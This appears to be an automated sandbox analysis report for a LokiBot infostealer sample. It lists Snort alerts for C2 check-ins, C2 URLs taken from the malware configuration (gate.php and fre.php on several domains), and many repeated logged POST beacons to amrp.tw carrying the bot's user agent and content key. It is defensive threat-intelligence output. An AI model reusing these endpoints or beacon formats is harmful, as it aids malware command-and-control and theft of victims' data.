                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49765 -> 35.247.234.230:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://amrp.tw/kayo/gate.php
Found C&C like URL pattern
Source: global traffic | HTTP traffic detected:
    POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 190
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
